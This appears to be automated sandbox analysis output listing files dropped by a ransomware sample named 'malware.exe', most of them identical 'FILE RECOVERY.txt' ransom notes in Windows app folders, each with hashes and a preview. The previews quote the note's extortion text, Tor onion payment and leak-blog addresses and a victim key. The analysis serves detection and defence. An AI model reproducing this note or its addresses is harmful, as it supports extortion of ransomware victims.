                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AC\INetCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AC\INetCookies\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AC\INetHistory\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AC\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\LocalCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\LocalState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\RoamingState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Settings\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\SystemAppData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\TempState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\INetCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\INetCookies\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\INetHistory\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
